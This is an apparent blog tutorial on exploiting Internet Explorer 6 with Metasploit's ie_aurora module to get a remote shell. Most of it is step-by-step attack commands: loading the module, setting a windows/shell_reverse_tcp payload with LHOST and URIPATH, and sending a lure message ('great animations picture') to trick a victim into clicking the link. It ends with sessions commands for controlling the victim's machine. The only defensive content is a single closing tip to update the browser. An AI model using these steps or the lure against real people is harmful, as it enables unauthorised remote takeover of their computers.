Type : Tutorial
Level : Medium, Advanced
This year will be end in a few weeks. I still remember at 2nd week of January of this year metasploit announce the new exploit for Internet Explorer 6 called ie_aurora memory corruption. Now when I live here in China, there's a lot of people still using Internet Explorer 6. I don't know why, maybe in my opinion all of the programmer here is very Windows minded. Yeah but that's not my problem, I just want to share the tutorial "Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb".
1. Backtrack Linux
2. ie_aurora.rb (Download From Mediafire.com)
1. Download ie_aurora.rb then copy to /pentest/exploits/framework3/modules/exploits/windows/browser/, or simply do this command after you download it to your Backtrack desktop
cp ie_aurora.rb /pentest/exploits/framework3/modules/exploits/windows/browser/
2. Run your metasploit console /pentest/exploits/framework3/msfconsole
3. Use the ie_aurora exploit and then set your PAYLOAD (I'm using shell_reverse_tcp)
set payload windows/shell_reverse_tcp
4. The next step you must set the standard options for this exploit.
set RHOST 192.168.1.2
Define your target IP address(optional)
set SRVPORT 80
Listening port number in target computer(usually web application in port 80)
set URIPATH ProofOfConcept
This is how our link looks like (example : http://www.google.com/ProofOfConcept)
set LHOST 192.168.1.8
We must specify what is the address of our computer.
5. When we're finish set up all of the requirement, just run the exploit command.
6. Okay we've already finish, the exploit generate the new URL and it's already listening in local port 80. The next step is sending the URL to the target and make them click the link we've given to them.
Hi fellas, you want to see the great animations picture in your browser?just follow this link http://192.168.1.8/ProofOfConcept
Below is the picture when the victim click the link.
7. The browser will start to load but never complete, it means that the exploit already work. We also can see at our Backtrack box that someone has been trapped.
8. There's a new sessions created, so we can use the sessions. To list the active sessions, run sessions -l command. To interract with the session, just see the session ID at the left side, then run sessions -i 1.
and now we're already inside the victim computer console. 🙂
1. Update your browser regularly. This exploit cannot work in Internet Explorer 7 or newer